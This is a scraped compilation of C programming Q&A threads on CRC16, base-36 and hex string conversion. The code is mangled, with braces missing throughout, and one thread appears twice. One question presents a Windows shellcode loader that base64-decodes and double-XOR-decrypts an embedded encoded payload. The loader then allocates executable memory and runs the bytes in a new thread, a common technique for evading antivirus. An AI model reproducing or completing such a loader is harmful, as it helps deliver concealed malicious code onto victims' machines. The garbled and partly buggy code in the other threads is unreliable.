Error calculating CRC16 for certain characters in C - c

I am trying to use this code to compute CRC16 bypass. For regular characters it works but for a hex sequence like 0xA0 0x00 0x01 0x01 it fails, not returning the correct value. Go easy on me, usually I do not write C code.
#include <stdio.h>
#include <string.h>
unsigned short CalculateCRC(unsigned char* a_szBuffuer, short a_sBufferLen){
unsigned short usCRC = 0;
for (short j = 0; j < a_sBufferLen; j++)
unsigned char* pucPtr = (unsigned char *)&usCRC;
*(pucPtr + 1) = *(pucPtr + 1) ^ *a_szBuffuer++;
for (short i = 0; i <= 7; i++)
if (usCRC & ((unsigned short) 0x8000))
usCRC = usCRC << 1;
usCRC = usCRC ^ ((unsigned short) 0x8005);
usCRC = usCRC << 1;
return (usCRC);
void append(char* s, char c)
int len = strlen(s);
s[len] = c;
s[len+1] = '\0';
int main() {
char d = (char)0xA0;
char d1 = (char)0x00;
char d2 = (char)0x01;
char d3 = (char)0x01;
char sss[256]="";
append(sss, d);
append(sss, d1);
append(sss, d2);
append(sss, d3);
unsigned char* uCB1 = (unsigned char*)sss;
unsigned short CRC= CalculateCRC(uCB1,4);
printf("CRC = %i\n", CRC);
printf("%s\n", sss);
printf("%x\n", CRC);

strlen(s); is for finding the length of a string, not for finding the length of a character array that is used, especially if it that may contain '\0'. #Eugene Sh.
Code needs to keep track of the array size used with another variable.
// void append(char* s, char c) {
void append(char* s, size_t *sz, char c) {
s[*sz] = c;
size_t size = 0;
append(sss, &size, d);
append(sss, &size, d1);
append(sss, &size, d2);
append(sss, &size, d3);
unsigned char* uCB1 = (unsigned char*)sss;
unsigned short CRC= CalculateCRC(uCB1, size);
// printf("%s\n", sss);
write a loop to print each `sss[]`.


Converting Signed Char Array That Involves Hex Characters to Unsigned Char Array

I am trying to create a shellcode by integrating XOR encryption and Base64 encoding. However, I have a problem. Base64 decoder that I found outputs char array but I need unsigned char array because all the rest of the algorithm is created for unsigned char array. I added my code below. Can you suggest a solution?
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include "windows.h"
/* ---- Base64 Encoding/Decoding Table --- */
char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
void b64_encode(char *clrstr, char *b64dst);
void decodeblock(unsigned char in[], char *clrstr);
void b64_decode(char *b64src, char *clrdst);
void encodeblock( unsigned char in[], char b64str[], int len );
int main() {
PVOID lclbuff;
HANDLE thrd;
int i;
//mysrc, first, encrypted by using key1 with XOR and again encrypted by using key2 with XOR. Then encoded with base64. Therefore, I need to reverse these steps.
char mysrc[] = "XHhmOFx4NTZceDgzXHhmMFx4ZTFceGU1XHhkZlx4MGNceDEwXHgxOFx4NGRceDQyXHg0OVx4NDlceDRiXHg1MVx4NDFceDQ5XHgyOVx4YzdceDYxXHg1Nlx4OGJceDQ2XHg3MVx4NDVceDk0XHg1ZVx4MDhceDUwXHg4N1x4NDFceDI4XHg1MVx4OTJceDcyXHg0N1x4NDlceDE3XHhhMlx4NGVceDU0XHg0ZFx4MjVceGQ4XHg0NVx4MmVceGNjXHhiY1x4MjRceDZkXHg2Zlx4MGFceDM1XHgzOVx4NDFceGQ2XHhjOFx4MTVceDU0XHgwNVx4ZGZceGUyXHhmOVx4NDNceDRjXHg0ZVx4NDRceDliXHg0YVx4MmNceDk4XHg0YVx4MjVceDUxXHgwMVx4YzdceDhhXHg5OFx4OWRceDA0XHgxZVx4MDBceDVjXHg5NFx4Y2RceDZiXHg2Ylx4NThceDE5XHhkY1x4NDNceDgzXHg1MVx4MDFceDQ0XHg5Y1x4NDFceDM4XHg1Y1x4MDVceGNlXHhlM1x4NDJceDU5XHhmMlx4ZDZceDRkXHg5Ylx4MmNceDg0XHg1Ylx4MDlceGNmXHg1NFx4MzFceGRlXHg0OVx4MjlceGQ1XHhhOFx4NWZceGMxXHhkZFx4MWNceDRjXHgxZVx4Y2RceDI4XHhmOFx4NzlceGUyXHg0NFx4MWFceDU1XHgyNFx4MWZceDQ0XHgyMVx4YzRceDcxXHhjNlx4NThceDUwXHg5YVx4NGRceDNiXHg0NVx4MTFceGM4XHg2YVx4NTJceDgzXHgxNVx4NTFceDQ0XHg5Y1x4NDFceDA0XHg1Y1x4MDVceGNlXHg0MVx4OWZceDE1XHg4NVx4NTdceDBkXHhjMFx4NTlceDU0XHg1Mlx4NTBceDQ3XHg0MFx4NWFceDU2XHg1OVx4NTlceDRjXHg0NVx4NDRceDQ4XHg5N1x4ZmRceDJkXHg1ZVx4NWVceGVmXHhmOFx4NTRceDUyXHg1MVx4NDNceDUxXHg4Ylx4MDVceGU4XHg0Zlx4ZWFceGZiXHhlMVx4NWRceDVkXHhhZlx4N2FceDZjXHgzZVx4NGZceDJiXHgzZVx4MTNceDA4XHg1OFx4NGZceDQ5XHg5ZVx4ZTdceDUwXHg5NFx4ZThceGJlXHgwMVx4MTRceDExXHg0NFx4OTZceGU5XHg1OVx4YTRceDBlXHgxM1x4MmRceDYyXHgxM1x4MDBceDE1XHgwNVx4NTlceDQxXHg0ZFx4OTdceGU0XHg1OFx4OThceGZjXHg1ZVx4YjZceDVjXHg2Zlx4MmFceDE0XHhmN1x4Y2NceDU1XHg4OVx4ZmRceDY5XHgxOVx4MTRceDA0XHgxZVx4NTlceDU1XHhhYlx4MjRceDlmXHg2N1x4MTBceGU3XHhkOVx4NDNceDU4XHg1NFx4MjhceGM5XHg1YVx4MzBceGQ4XHg1ZFx4ZmJceGRlXHg0OFx4OWRceGQzXHg0NVx4ZTBceGNjXHg1OFx4OTFceGNkXHg1Mlx4YjJceGYzXHgxNlx4ZGZceGY3XHhmZVx4Y2RceDVkXHg4ZFx4ZDlceDZhXHgwNFx4NTBceDU1XHg1M1x4ODVceGYyXHg1MFx4ODVceGVhXHg0OVx4YTNceDgwXHhhNVx4NjNceDYwXHhlN1x4YzBceDRjXHg5Zlx4YzRceDU0XHgxM1x4MGRceDFmXHg0NVx4YThceDdiXHg2MVx4NzdceDA4XHgxOVx4MTlceDAwXHgxN1x4NDBceDQ4XHg1NFx4NTRceDU2XHg4OVx4ZjZceDQ2XHg1YVx4NDhceDQxXHgyMVx4ZDhceDY2XHgxZVx4NTFceDU4XHg0OVx4ZTJceGViXHg2N1x4ZGZceDUxXHgyMFx4NGFceDAxXHgxNVx4NTlceDgwXHg1Ylx4MjhceDA4XHhkZVx4MGNceDdiXHg0MFx4OTBceGZmXHg1Nlx4NDdceDQwXHg0OFx4NTRceDU0XHg1Zlx4NTBceDVkXHhlZVx4Y2RceDVlXHg1Y1x4NTlceGU3XHhjNFx4NWVceDgxXHhkOFx4NTVceDg5XHhkNlx4NDBceGEyXHg2Y1x4YzhceDIxXHg4Nlx4ZWJceGM0XHg0NVx4MmVceGRlXHg1OFx4ZTdceGM2XHg5OFx4MDZceDU4XHhhM1x4MDhceDkwXHgxY1x4NzhceGVhXHhkMVx4YTVceGYwXHhhMVx4YjNceDViXHg1ZVx4YjZceGI2XHg4ZFx4YjFceDhlXHhmN1x4Y2NceDUxXHg4M1x4ZDNceDI5XHgyNFx4MTNceDc4XHgxNFx4ODBceGVmXHhmMVx4NzhceDFhXHhiN1x4NTdceDBiXHg3ZVx4N2NceDYyXHgxOVx4NDBceDQxXHg5ZVx4ZGJceGU3XHhjMA==";
char myb64[1840];
unsigned char nw[1840];
b64_decode(mysrc, myb64);
printf("%s\n", myb64); // This gives following and true output: \xf8\x56\x83\xf0\xe1\xe5\xdf\x0c\x10\x18...
//However, It must reside inside an unsigned char array, as occurs in the output above.
//The output above must be turned into unsigned char array which is 'nw'. What can I do?
char key1[] = "elma";
char key2[] = "armut";
for(i=0; i<sizeof(nw)-1; i++){
nw[i]^=key2[i % strlen(key2)];
for(i=0; i<sizeof(nw)-1; i++){
nw[i]^=key1[i % strlen(key1)];
lclbuff = VirtualAlloc(NULL, sizeof(nw), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
CopyMemory(lclbuff, nw, sizeof(nw));
thrd = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lclbuff, NULL, 0, NULL);
WaitForSingleObject(thrd, INFINITE);
return 0;
// The functions below are only needed to base64 encoding/decoding. Therefore, we can pass them.
/* encode - base64 encode a stream, adding padding if needed */
void b64_encode(char *clrstr, char *b64dst) {
unsigned char in[3];
int i, len = 0;
int j = 0;
b64dst[0] = '\0';
while(clrstr[j]) {
len = 0;
for(i=0; i<3; i++) {
in[i] = (unsigned char) clrstr[j];
if(clrstr[j]) {
len++; j++;
else in[i] = 0;
if( len ) {
encodeblock( in, b64dst, len );
/* decodeblock - decode 4 '6-bit' characters into 3 8-bit binary bytes */
void decodeblock(unsigned char in[], char *clrstr) {
unsigned char out[4];
out[0] = in[0] << 2 | in[1] >> 4;
out[1] = in[1] << 4 | in[2] >> 2;
out[2] = in[2] << 6 | in[3] >> 0;
out[3] = '\0';
strncat(clrstr, out, sizeof(out));
void b64_decode(char *b64src, char *clrdst) {
int c, phase, i;
unsigned char in[4];
char *p;
clrdst[0] = '\0';
phase = 0; i=0;
while(b64src[i]) {
c = (int) b64src[i];
if(c == '=') {
decodeblock(in, clrdst);
p = strchr(b64, c);
if(p) {
in[phase] = p - b64;
phase = (phase + 1) % 4;
if(phase == 0) {
decodeblock(in, clrdst);
/* encodeblock - encode 3 8-bit binary bytes as 4 '6-bit' characters */
void encodeblock( unsigned char in[], char b64str[], int len ) {
unsigned char out[5];
out[0] = b64[ in[0] >> 2 ];
out[1] = b64[ ((in[0] & 0x03) << 4) | ((in[1] & 0xf0) >> 4) ];
out[2] = (unsigned char) (len > 1 ? b64[ ((in[1] & 0x0f) << 2) |
((in[2] & 0xc0) >> 6) ] : '=');
out[3] = (unsigned char) (len > 2 ? b64[ in[2] & 0x3f ] : '=');
out[4] = '\0';
strncat(b64str, out, sizeof(out));

Decimal to octal converter in c [duplicate]

I can use the strtol function for turning a base36 based value (saved as a string) into a long int:
long int val = strtol("ABCZX123", 0, 36);
Is there a standard function that allows the inversion of this? That is, to convert a long int val variable into a base36 string, to obtain "ABCZX123" again?
There's no standard function for this. You'll need to write your own one.
Usage example:
const char digits[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
char *reverse(char *str)
char *end = str;
char *start = str;
if(!str || !*str) return str;
while(*(end + 1)) end++;
while(end > start)
int ch = *end;
*end-- = *start;
*start++ = ch;
return str;
char *tostring(char *buff, long long num, int base)
int sign = num < 0;
char *savedbuff = buff;
if(base < 2 || base >= sizeof(digits)) return NULL;
*buff++ = digits[abs(num % base)];
num /= base;
*buff++ = '-';
*buff = 0;
return savedbuff;
One of the missing attributes of this "Convert long integer to base 36 string" is string management.
The below suffers from a potential buffer overflow when destination is too small.
char *long_to_string(char *destination, long num, int base);
(Assuming 32-bit long) Consider the overflow of below as the resultant string should be "-10000000000000000000000000000000", which needs 34 bytes to encode the string.
char buffer[33]; // Too small
long_to_string(buffer, LONG_MIN, 2); // Oops!
An alternative would pass in the buffer size and then provide some sort of error signaling when the buffer is too small.
char* longtostr(char *dest, size_t size, long a, int base)
Since C99, code instead could use a compound literal to provide the needed space - without calling code trying to compute the needed size nor explicitly allocate the buffer.
The returned string pointer from TO_BASE(long x, int base) is valid until the end of the block.
#include <assert.h>
#include <limits.h>
#define TO_BASE_N (sizeof(long)*CHAR_BIT + 2)
// v. compound literal .v
#define TO_BASE(x, b) my_to_base((char [TO_BASE_N]){""}, (x), (b))
char *my_to_base(char *buf, long a, int base) {
assert(base >= 2 && base <= 36);
long i = a < 0 ? a : -a; // use the negative side - this handle _MIN, _MAX nicely
char *s = &buf[TO_BASE_N - 1];
*s = '\0';
do {
*s = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"[-(i % base)];
i /= base;
} while (i);
if (a < 0) {
*s = '-';
// Could add memmove here to move the used buffer to the beginning
return s;
#include <limits.h>
#include <stdio.h>
int main(void) {
long ip1 = 0x01020304;
long ip2 = 0x05060708;
long ip3 = LONG_MIN;
printf("%s %s\n", TO_BASE(ip1, 16), TO_BASE(ip2, 16), TO_BASE(ip3, 16));
printf("%s %s\n", TO_BASE(ip1, 2), TO_BASE(ip2, 2), TO_BASE(ip3, 2));
puts(TO_BASE(ip1, 8));
puts(TO_BASE(ip1, 36));
puts(TO_BASE(ip3, 10));
Here is another option with no need for source array of charaters, but less portable since not all character encodings have contiguous alphabetic characters, for example EBCDIC. Test HERE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdbool.h>
#include <limits.h>
char get_chars(long long value)
if (value >= 0 && value <= 9)
return value + '0';
return value - 10 + 'A';
void reverse_string(char *str)
int len = strlen(str);
for (int i = 0; i < len/2; i++)
char temp = str[i];
str[i] = str[len - i - 1];
str[len - i - 1] = temp;
char* convert_to_base(char *res, int base, long long input)
bool flag = 0;
int index = 0;
if(input < 0){
input = llabs(input);
flag = 1;
else if(input == 0){
res[index++] = '0';
res[index] = '\0';
return res;
while(input > 0)
res[index++] = get_chars(input % base);
input /= base;
res[index++] = '-';
res[index] = '\0';
return res;
int main() {
long long input = 0;
printf("** Integer to Base-36 **\n ");
printf("Enter a valid number: ");
scanf("%lld", &input);
if(input >= LLONG_MAX && input <= LLONG_MIN){
printf("Invalid number");
return 0;
int base = 36;
char res[100];
printf("%lld -> %s\n", input, convert_to_base(res, base, input));
return 0;

Convert long integer(decimal) to base 36 string (strtol inverted function in C)

I can use the strtol function for turning a base36 based value (saved as a string) into a long int:
long int val = strtol("ABCZX123", 0, 36);
Is there a standard function that allows the inversion of this? That is, to convert a long int val variable into a base36 string, to obtain "ABCZX123" again?
There's no standard function for this. You'll need to write your own one.
Usage example:
const char digits[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
char *reverse(char *str)
char *end = str;
char *start = str;
if(!str || !*str) return str;
while(*(end + 1)) end++;
while(end > start)
int ch = *end;
*end-- = *start;
*start++ = ch;
return str;
char *tostring(char *buff, long long num, int base)
int sign = num < 0;
char *savedbuff = buff;
if(base < 2 || base >= sizeof(digits)) return NULL;
*buff++ = digits[abs(num % base)];
num /= base;
*buff++ = '-';
*buff = 0;
return savedbuff;
One of the missing attributes of this "Convert long integer to base 36 string" is string management.
The below suffers from a potential buffer overflow when destination is too small.
char *long_to_string(char *destination, long num, int base);
(Assuming 32-bit long) Consider the overflow of below as the resultant string should be "-10000000000000000000000000000000", which needs 34 bytes to encode the string.
char buffer[33]; // Too small
long_to_string(buffer, LONG_MIN, 2); // Oops!
An alternative would pass in the buffer size and then provide some sort of error signaling when the buffer is too small.
char* longtostr(char *dest, size_t size, long a, int base)
Since C99, code instead could use a compound literal to provide the needed space - without calling code trying to compute the needed size nor explicitly allocate the buffer.
The returned string pointer from TO_BASE(long x, int base) is valid until the end of the block.
#include <assert.h>
#include <limits.h>
#define TO_BASE_N (sizeof(long)*CHAR_BIT + 2)
// v. compound literal .v
#define TO_BASE(x, b) my_to_base((char [TO_BASE_N]){""}, (x), (b))
char *my_to_base(char *buf, long a, int base) {
assert(base >= 2 && base <= 36);
long i = a < 0 ? a : -a; // use the negative side - this handle _MIN, _MAX nicely
char *s = &buf[TO_BASE_N - 1];
*s = '\0';
do {
*s = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"[-(i % base)];
i /= base;
} while (i);
if (a < 0) {
*s = '-';
// Could add memmove here to move the used buffer to the beginning
return s;
#include <limits.h>
#include <stdio.h>
int main(void) {
long ip1 = 0x01020304;
long ip2 = 0x05060708;
long ip3 = LONG_MIN;
printf("%s %s\n", TO_BASE(ip1, 16), TO_BASE(ip2, 16), TO_BASE(ip3, 16));
printf("%s %s\n", TO_BASE(ip1, 2), TO_BASE(ip2, 2), TO_BASE(ip3, 2));
puts(TO_BASE(ip1, 8));
puts(TO_BASE(ip1, 36));
puts(TO_BASE(ip3, 10));
Here is another option with no need for source array of charaters, but less portable since not all character encodings have contiguous alphabetic characters, for example EBCDIC. Test HERE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdbool.h>
#include <limits.h>
char get_chars(long long value)
if (value >= 0 && value <= 9)
return value + '0';
return value - 10 + 'A';
void reverse_string(char *str)
int len = strlen(str);
for (int i = 0; i < len/2; i++)
char temp = str[i];
str[i] = str[len - i - 1];
str[len - i - 1] = temp;
char* convert_to_base(char *res, int base, long long input)
bool flag = 0;
int index = 0;
if(input < 0){
input = llabs(input);
flag = 1;
else if(input == 0){
res[index++] = '0';
res[index] = '\0';
return res;
while(input > 0)
res[index++] = get_chars(input % base);
input /= base;
res[index++] = '-';
res[index] = '\0';
return res;
int main() {
long long input = 0;
printf("** Integer to Base-36 **\n ");
printf("Enter a valid number: ");
scanf("%lld", &input);
if(input >= LLONG_MAX && input <= LLONG_MIN){
printf("Invalid number");
return 0;
int base = 36;
char res[100];
printf("%lld -> %s\n", input, convert_to_base(res, base, input));
return 0;

How to convert literal char hex value into the hex value itself?

I'm having the literal value that should be stored on an unsigned char[64] array. How can I convert such values to it's hex equivalent?
int main() {
unsigned char arry[1] = { 0xaa }
char* str = "fe"; //I want to store 0xfe on arry[0]
arry[0] = 0xfe; // this works, but I have to type it
arry[0] = 0x + str; //obviously fails
return 0;
Any pointers?
arr[0] = strtol(str,NULL,16); // If one entry is big enough to hold it.
For each character c, the value is:
if ('0' <= c && c <= '9') return c - '0';
if ('a' <= c && c <= 'f') return c - 'a' + 10;
if ('A' <= c && c <= 'F') return c - 'A' + 10;
// else error, invalid digit character
Now just iterate over the string from left to right, adding up the digit values, and multiplying the result by 16 each time.
(This is implemented for you by the standard library in the strto*l functions with base 16.)
Use function strtol() to convert a string to a long in a specific base:
"Parses the C-string str interpreting its content as an integral number of the specified base, which is returned as a long int value. If endptr is not a null pointer, the function also sets the value of endptr to point to the first character after the number."
#include <stdio.h> /* printf */
#include <stdlib.h> /* strtol */
int main ()
char szNumbers[] = "2001 60c0c0 -1101110100110100100000 0x6fffff";
char * pEnd;
long int li1, li2, li3, li4;
li1 = strtol (szNumbers,&pEnd,10);
li2 = strtol (pEnd,&pEnd,16);
li3 = strtol (pEnd,&pEnd,2);
li4 = strtol (pEnd,NULL,0);
printf ("The decimal equivalents are: %ld, %ld, %ld and %ld.\n", li1, li2, li3, li4);
return 0;
Put together an arbitrary length solution to and from.
Sadly the String to X is verbose: pesky dealing with non hex string, odd length, too big, etc.
#include <string.h>
#include <stdio.h>
// S assumed to be long enough.
// X is little endian
void BigXToString(const unsigned char *X, size_t Length, char *S) {
size_t i;
for (i = Length; i-- > 0; ) {
sprintf(S, "%02X", X[i]);
S += 2;
int BigStringToX(const char *S, unsigned char X[], size_t Length) {
size_t i;
size_t ls = strlen(S);
if (ls > (Length * 2)) {
return 1; //fail, too big
int flag = ls & 1;
size_t Unused = Length - (ls/2) - flag;
memset(&X[Length - Unused], 0, Unused); // 0 fill unused
char little[3];
little[2] = '\0';
for (i = Length - Unused; i-- > 0;) {
little[0] = *S++;
little[1] = flag ? '\0' : *S++;
flag = 0;
char *endptr;
X[i] = (unsigned char) strtol(little, &endptr, 16);
if (*endptr) return 1; // non-hex found
if (*S == '\0') break;
return 0;
int main() {
unsigned char X[64];
char S[64 * 2 + 2];
char T[64 * 2 + 2];
strcpy(S, "12345");
BigStringToX(S, X, sizeof(X));
BigXToString(X, sizeof(X), T);
printf("'%s'\n", T);
return 0;

Hex to ascii string conversion

i have an hex string and want it to be converted to ascii string in C. How can i accomplish this??
you need to take 2 (hex) chars at the same time... then calculate the int value
and after that make the char conversion like...
char d = (char)intValue;
do this for every 2chars in the hex string
this works if the string chars are only 0-9A-F:
#include <stdio.h>
#include <string.h>
int hex_to_int(char c){
int first = c / 16 - 3;
int second = c % 16;
int result = first*10 + second;
if(result > 9) result--;
return result;
int hex_to_ascii(char c, char d){
int high = hex_to_int(c) * 16;
int low = hex_to_int(d);
return high+low;
int main(){
const char* st = "48656C6C6F3B";
int length = strlen(st);
int i;
char buf = 0;
for(i = 0; i < length; i++){
if(i % 2 != 0){
printf("%c", hex_to_ascii(buf, st[i]));
buf = st[i];
Few characters like alphabets i-o couldn't be converted into respective ASCII chars .
like in string '6631653064316f30723161' corresponds to fedora . but it gives fedra
Just modify hex_to_int() function a little and it will work for all characters.
modified function is
int hex_to_int(char c)
if (c >= 97)
c = c - 32;
int first = c / 16 - 3;
int second = c % 16;
int result = first * 10 + second;
if (result > 9) result--;
return result;
Now try it will work for all characters.
strtol() is your friend here. The third parameter is the numerical base that you are converting.
#include <stdio.h> /* printf */
#include <stdlib.h> /* strtol */
int main(int argc, char **argv)
long int num = 0;
long int num2 =0;
char * str. = "f00d";
char * str2 = "0xf00d";
num = strtol( str, 0, 16); //converts hexadecimal string to long.
num2 = strtol( str2, 0, 0); //conversion depends on the string passed in, 0x... Is hex, 0... Is octal and everything else is decimal.
printf( "%ld\n", num);
printf( "%ld\n", num);
If I understand correctly, you want to know how to convert bytes encoded as a hex string to its form as an ASCII text, like "537461636B" would be converted to "Stack", in such case then the following code should solve your problem.
Have not run any benchmarks but I assume it is not the peak of efficiency.
static char ByteToAscii(const char *input) {
char singleChar, out;
memcpy(&singleChar, input, 2);
sprintf(&out, "%c", (int)strtol(&singleChar, NULL, 16));
return out;
int HexStringToAscii(const char *input, unsigned int length,
char **output) {
int mIndex, sIndex = 0;
char buffer[length];
for (mIndex = 0; mIndex < length; mIndex++) {
sIndex = mIndex * 2;
char b = ByteToAscii(&input[sIndex]);
memcpy(&buffer[mIndex], &b, 1);
*output = strdup(buffer);
return 0;
